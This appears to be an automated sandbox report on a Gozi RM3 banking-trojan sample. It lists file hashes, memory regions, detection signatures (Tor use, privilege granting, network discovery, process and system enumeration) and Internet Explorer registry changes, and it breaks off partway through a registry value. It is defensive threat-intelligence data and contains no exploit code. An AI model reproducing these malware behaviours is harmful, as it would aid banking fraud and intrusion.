SHA512 1af7e5c6f0fe074a93da9c6e8cca7afd9e07c27870c69aacd49eb79acca74d349df12dc41589c8f2fc3c408915ccf6f2a321e50856e42cbec6736aed8ad13658

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 70f11d88a2c034021c1964b0d3553522
SHA1 45dd2e2a689af1e23c637d5491bbf03036b96131
SHA256 14b68c058cd1f1971bc1888b1506989df308226167e4b6128c1facaeef053c2e
SHA512 46a735df639d4fdc413325a4f4d29f6894ab05c86335df0055593be171dfe4c72ebdfb13b4e1901603f8425f328c81a2072e338e79c5393a2b1ff5a898a39e48

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 a93dac0c8b0a75f5c7dd20a9325f5d86
SHA1 eabf861ebe7cc22e938444e1c12e4e006190fe54
SHA256 f31460e823be9de1ce494a4837112166b5c52d3bb3b9b543db2ab36d7fb9fed4
SHA512 27e29188dd432a3bef5a6b79b5546e3ffdedbb724def76ecab6e9ff72ef02a2124bd0bde728752e78e79512618ade0962eb7da52fdc666d44803a21f3a7f3f34

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/1292-71-0x000007FEFC1E1000-0x000007FEFC1E3000-memory.dmp

memory/1292-72-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

memory/1292-73-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1292-74-0x00000000025B0000-0x00000000025B2000-memory.dmp

memory/1292-75-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1292-76-0x00000000025B2000-0x00000000025B4000-memory.dmp

memory/1292-77-0x00000000025B4000-0x00000000025B7000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d61c2a7edf4b81f7be45de1e33d9fb64
SHA1 505daf37edd55e9efe6ad032662bfdaaa788651c
SHA256 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d
SHA512 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3

memory/1640-80-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

memory/1292-81-0x00000000025BB000-0x00000000025DA000-memory.dmp

memory/1640-83-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1640-84-0x0000000002340000-0x0000000002342000-memory.dmp

memory/1640-85-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1640-86-0x0000000002342000-0x0000000002344000-memory.dmp

memory/1640-87-0x0000000002344000-0x0000000002347000-memory.dmp

memory/1640-82-0x000000001B830000-0x000000001BB2F000-memory.dmp

memory/1640-88-0x000000000234B000-0x000000000236A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d61c2a7edf4b81f7be45de1e33d9fb64
SHA1 505daf37edd55e9efe6ad032662bfdaaa788651c
SHA256 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d
SHA512 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3

memory/844-91-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

memory/844-92-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/844-93-0x0000000002690000-0x0000000002692000-memory.dmp

memory/844-94-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/844-95-0x0000000002692000-0x0000000002694000-memory.dmp

memory/844-96-0x0000000002694000-0x0000000002697000-memory.dmp

memory/844-97-0x000000000269B000-0x00000000026BA000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline

MD5 1f137f80c2a51641b19c6ab62739c7c7
SHA1 780317fa83c473a066a2b950440cc487c922e793
SHA256 e8e9879453ff3967159dae041ea0269c2de114e6aeb7946098e332b7ff36854e
SHA512 4f8ee12f4ba7d25f2684a4ca844573366af8c7bbb811171178fff1f47643233311697f27c5bc8839ce230757bab3dcf7ae59163a280a63ccb7bb99cc7b927374

\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

\??\c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp

MD5 00ab387cf5240f9e079347f0fc570b9d
SHA1 0158ed109b684079468cd3c3e46baec04e623a3c
SHA256 65cae3a9bffd254b5f9246019f3cbd0bc0fc5df4bbeb4930d28912bdf030f5c9
SHA512 1c3c00836c38e1b96314f2ae1aabfa3de362acedc035b74a2f314d347b1389e1011a33c47f67812f5a84d5a549ca31793b871996347d0b80c698feca0e46bce2

C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp

MD5 b56a0bebf61835e3f214da735ae84bf4
SHA1 040276c15a8a87684e1ec3abd39997c9aba75114
SHA256 8b016763de40b335e30228711944cf55dcc6456fc3d810f9ed97a7074c3baeeb
SHA512 7d32dc5daa6a6b0ae389bfad8646563e694914afc36785a65247939b28420a7aacaf8e078301dbada943ae62da54dd88e99a225f1e7170838cfdee652fd10fea

C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.dll

MD5 3063266ffdcfe2c4a0939b06ea3717b4
SHA1 b94790c56db20b47ae1b6519a05417923c0efa42
SHA256 eeaefce42beb6ba7172bf5d75002ba232dd1e59daabc0fc1a43ce03f53b55b74
SHA512 b31d97e6b6cdb3604b519d9c554deaaaa295b437a212a489b6262d44b9c43ba20918d2ae4fc6c060e1652e6390fbeb2ab964c64be93a4e6894bd60fd0c74a717

C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.pdb

MD5 355cfdfd67fae9c87ea6e1a3955427ee
SHA1 88608dad2ee5c8bd4b6d65645571c76135d1d684
SHA256 95be07ab865d625257dd8669b2bf95e1cf7a73022b545082d37c1b50d509b647
SHA512 480cee09bb4440dda1e6ef244e0eb085dfaa44d7fcab65e067c8bde9fc8de2022d0b29d6407de358e1dd52aeb0c4bceb78fd30e15d625ee2c828f84288f2c787

\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline

MD5 d456f4da9b60e70744fc1d3492130437
SHA1 e721393fd973986ae5e965f2ced2506c54708e2e
SHA256 bbe537ea5aba3262de669dd6aba27be1e28707f046ade852a3a3082a19c0e541
SHA512 55930d623887eafbd93cfe8da972227bb4f159ecfc300562450f72974525193d65cefce6ac0d2e4b550e7e1c8b29192b24a622e98ffa563d33d987ad53737e7d

\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

\??\c:\Users\Admin\AppData\Local\Temp\CSC20.tmp

MD5 32ef79ada32c2c2aac964c292c338d9c
SHA1 a847f9e830ee32eb54aedae7a5a6152ffb78dd95
SHA256 dba94e58c55d3e1e42a2dcbe68fbd319702714e587ea8e19ef9427b9c1b740ee
SHA512 614c694b3bf0dc31b0b54072340c181cc710e9acd425c246eabe1dae05bb124d0413fbeed4541c60e434122e5302c1dbc1f104013f5ba596d0a0b1ddd76c6265

C:\Users\Admin\AppData\Local\Temp\RES21.tmp

MD5 367cc1ea803e51f6373873e2fae1b614
SHA1 0716aeb25b03d2039b52d4858a72dd1f30141d6e
SHA256 49d20edbe5ede206071a7071a93616ea281154046845f4a702eb42cb722de6a1
SHA512 e6bdbabc0c8dc0ad4f794e43abc72480cd9ab6c0d4636eedf48baf5661eb7d0a4a38878fb8322f23330f4b3314dcc44bb846cbc2ac351aa5704f156cad647799

C:\Users\Admin\AppData\Local\Temp\adua5uv0.dll

MD5 1128201d45c30519cccd84ddd9b0d894
SHA1 d505ec80cef79a255949c86c88f6d75770c1bbfd
SHA256 653dda67447686b2d7d6c91d0183920461fb38698d3a4cec849f71ecfa5ac302
SHA512 eb3835b33db10c7b29fe95b4857888fe5f08892a1fdc7c8552820e4db3230132880df06c5a6643d0024e36e4572faab92bcd06dd74fccf6d827297dfc88091df

C:\Users\Admin\AppData\Local\Temp\adua5uv0.pdb

MD5 8071cc09c71db6ec209768f4debc80ee
SHA1 4916a8d80d95e1cd4a505d8197cd42faca4ca8cf
SHA256 dd503ab6fceccddb655c51bb7d361cf7eb6cb0f91ab586f583b966f09b1a068f
SHA512 c2b07e16ab7fec5b02075c2aa5d731a038f447d2c4d0da35e84434234ed6a2533b70cc8e1883531f6edc912ad2a6b6d993e6a74df2b321ae8b153de46fc57b5c

memory/1292-110-0x000000001B660000-0x000000001B673000-memory.dmp

memory/304-111-0x00000000002D0000-0x0000000000311000-memory.dmp

memory/1368-112-0x00000000029B0000-0x00000000029C5000-memory.dmp

memory/1368-718-0x0000000002990000-0x00000000029A5000-memory.dmp

C:\Users\Admin\~Columnsoftware.DDF

MD5 3e25bda21d35fe79e726d526d9ceb030
SHA1 e9e8d6070068e019b5243b6cd4d5e24b12dd8796
SHA256 8f6e21ab45d1631d565b15bd8367d6a1702219c3c21d95200f7c2b37dd2d5a34
SHA512 6b48ef106bccf877635c496f7d25c72f75993311f7f1189e0437c16616b26c9d62c9dddd7f8962dd5bf349f6125f93c124376f634231ef768f56c5a0280c308e

C:\Users\Admin\~Columnsoftware_LAYOUT.INF

MD5 7aacfc1d6af97be98a41d4e8d7087332
SHA1 75770af6f11a2aed72c96d0996818fa6e3f0780d
SHA256 fef82285bf4b68a83b4a2d011a203e170be145ce850ec6cf6985616dbf61675c
SHA512 07ee854501c49af974691f261dc88a52074133ae33382f554b2e6c026fea3dd8778ba404780e4ea8c4089d70ae4d0e5a7ea66d70d08ab2bbdda292d4fdefd518

C:\Users\Admin\~Columnsoftware.RPT

MD5 93d6c414c2c5115499497110d7c4bb8e
SHA1 22b1c6cf1dbf3be56bd810c1306eec7dd930edb4
SHA256 085b77cd3e8eceae456842612c1aed3608b6332d0809dd1c2c24b0468f8926dd
SHA512 f746af12b5606bea7535482842bfb1e0513efdf999e7fa378e077eabe6bb69ac448aa5bfc2d7dacb54daf5903174f169fb082e9ddcfd210ff3220f9db5447fec

C:\Users\Admin\~Columnsoftware.CAB

MD5 3c234cb15748c957069af8ae2cc42039
SHA1 1d9faa7321914af5ad01e74ba6a3dd1a496cd68d
SHA256 fc7ade38fe0eaebfe886ff998593ee34f5d0d724274eb876ffb30d0f36807da1
SHA512 27cb59f24874705d9d7c8d080a58d5fb270c0ab34d435a81f6d13639807a4a08d665d4ba3076285c178d9d7cf78d897355660fac6db15e7ff29f5de837cf4222

C:\Users\Admin\AppData\Local\Temp\5BA0.bin0

MD5 768165e0abf16bf3056836d5431a7296
SHA1 9fb3196be60e49bfc319ebd9e0b103954d711e34
SHA256 b44c505b721e93e2a596577018cc65b993cd632b9fe7620a4b3db54031afff5d
SHA512 1250ec40ba20f39a5b9a3aafd45c63cb6f1bf48b89acce1f885470c936fb48a803081943c68458ba1adce92d5fe79d3e45682285f56ecb29884d41974269992d

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 5f5179cca63bdf7f82bf9868710984e7
SHA1 899dcdea948341125761e3b5a6c99a8e868eb937
SHA256 e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72
SHA512 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 5f5179cca63bdf7f82bf9868710984e7
SHA1 899dcdea948341125761e3b5a6c99a8e868eb937
SHA256 e9a9c4f722bb617c5b880e30261e134af86d847a64891123ab27a888aac2fb72
SHA512 87a2778d2fa6ca4922db3599a95032b59c18ccaee4fa3e8dba9e582d73c40a7d1cdc133097f4ff359cd8f49bc10b906c648ee0ade084fdd616d4c2801a4840d7

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 f730411a9a43c7d05a451c3b646a4b86
SHA1 5f79b8f800b68fa4509f21a4ef3bf61922d515dc
SHA256 bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f
SHA512 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 f730411a9a43c7d05a451c3b646a4b86
SHA1 5f79b8f800b68fa4509f21a4ef3bf61922d515dc
SHA256 bd1fa4e7be0fa6ada515d1b2bd2cfeeb64db25d4ada0c6e19af93ddf79a0dd7f
SHA512 043716c1627d66ac7a61d39b09e6049fee39f66cd5e11dcbcc7304a22704a3f964e45463bdcc21f862f8689263cfc2ee85a69c978be8089d8cce4c28ebcd7a43

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 77c4ec68d22d4a45b126647d83f0c387
SHA1 dd09bf1f2448a85096dc09c5b8305f25bd979f57
SHA256 f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6
SHA512 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 77c4ec68d22d4a45b126647d83f0c387
SHA1 dd09bf1f2448a85096dc09c5b8305f25bd979f57
SHA256 f6daa660c5ec9e46b1fbf17fccfbbc183e0d8b79b1539245a92b234a53cad8f6
SHA512 0917856769fd27ae41cf25e067f7777cf7b06792eb4ebe7d4fb93661157cb6c5cfa4ab69079336e0526656b121be58b0f770efddf1b8e533b2cca26389a43dfc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 50123f5383e92fb265949158b9972f0b
SHA1 d75e071a98c9ebdd48e70b0d4bef171d9df5611d
SHA256 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa
SHA512 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 50123f5383e92fb265949158b9972f0b
SHA1 d75e071a98c9ebdd48e70b0d4bef171d9df5611d
SHA256 63bd913ca898b45989302b672c93dc475ca7ae3e119ca0abd0218fd1b965fdaa
SHA512 581838e60d44530dac746e90acd912cfab6ad78b0f39d842ed2b230976297a950deaa3f928743fff933239d168c695cbff3cd4bb8b7ca886efac3076e732a97f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 cad53cca46626dd11590e9a0011847f0
SHA1 abeddf2e3e6b4e503281e152270c872ba2ad90af
SHA256 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2
SHA512 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 cad53cca46626dd11590e9a0011847f0
SHA1 abeddf2e3e6b4e503281e152270c872ba2ad90af
SHA256 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2
SHA512 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 893f8524287e635bc325c12517b1eca9
SHA1 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94
SHA256 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a
SHA512 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 893f8524287e635bc325c12517b1eca9
SHA1 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94
SHA256 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a
SHA512 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 01f148eb1c87e87e79f1cb57591e1f9e
SHA1 e1536cbec4ab23ba0b508a2799ccb9925088b8ab
SHA256 e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071
SHA512 ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 01f148eb1c87e87e79f1cb57591e1f9e
SHA1 e1536cbec4ab23ba0b508a2799ccb9925088b8ab
SHA256 e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071
SHA512 ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 1b0c5c633d5f11e84a546f436da6edfb
SHA1 6f68c61a04083147f97e0d09b2ae3ca3206afe8d
SHA256 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12
SHA512 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 1b0c5c633d5f11e84a546f436da6edfb
SHA1 6f68c61a04083147f97e0d09b2ae3ca3206afe8d
SHA256 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12
SHA512 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 348ea633774cdb59e525c1744df6608b
SHA1 f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d
SHA256 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de
SHA512 f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 348ea633774cdb59e525c1744df6608b
SHA1 f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d
SHA256 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de
SHA512 f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a

C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

MD5 69101071e1de615d8449b4a118d51e2e
SHA1 9a04639583310c6f0dbb15dcdcb81a480e54dd22
SHA256 c464da6490735ef3e20d33d4a4624af00bb3e3a942d6a588fcc618c5ec6e138e
SHA512 8a99c0d080af7cfdc2914840e6b36cf5dd706dcf0254c65347b3c5b10aefd2296529fdf3b5bf8ff00fab9331a06ce4a296e6bcf342fbe3ed1464d59b26665dd0

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 08:05

Reported

2022-03-15 08:35

Platform

win10v2004-en-20220113

Max time kernel

1696s

Max time network

1776s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Grants admin privileges

Uses Tor communications

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Restr.exe

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2317671783" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1064f97d4338d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000af0b005e4d17189b80f17a7a9b9fae8dde5b3ee941963c35b330c332e6c35938000000000e800000000200002000000032baa51108dee1171cafe41bc03a45193341b239dbbd1408288a071e2f31768cc00000008ca69103c90cbb9d70b1dc7a31329374def34971f2aee6fbf1665acd6aaf5680586a96c25d07de46f72c857cd5be0137b5b4c77015a65ead41299de3b7b25e906d0554705b4ca6e6ad0056c11cbd420825ea7b34e4316dcacb0a6f31764665ac9b9640f2d0da0c5d3828eeb7fb42f1f88e7d024a56954cf1bbc8f3266f7f0e2b352dd10f2f04ee5e9ae47bb8baa33fbba0f98fc0c9bfe063f614272d2285f8a4eeed9b63edf4ea9e8e3f48a2df5965aeac7cbdd08b7725051a082d5fccb20603400000005832b57c34f5d8a5a89e69e152e47853950844bd6fed7a58a134c958bf9abafdbf9c8638699242eddfcd4935002207c77e54ae8c0073a45a376167519021c399 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000694908dbfb46b57cd6968555a943005e9119959593d00753b9321fd109749f6f000000000e8000000002000020000000bb00d8a1068d77372474e6e05666d87be8542d8d50dcfa6309fd3e30a23dcc6120000000bdd9b023ff3c8e96d682cc50e317e1622624ec1843c96d1648c5d9f55206baf84000000092099aac9dd1ede2d30e05180d80f415c8a1be5f00a5222873d56860a8a83c00fbf63ab02ece3f848ccc883fa7e0f00e778ae2c5406c37d5c1f8592155cdcf78 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 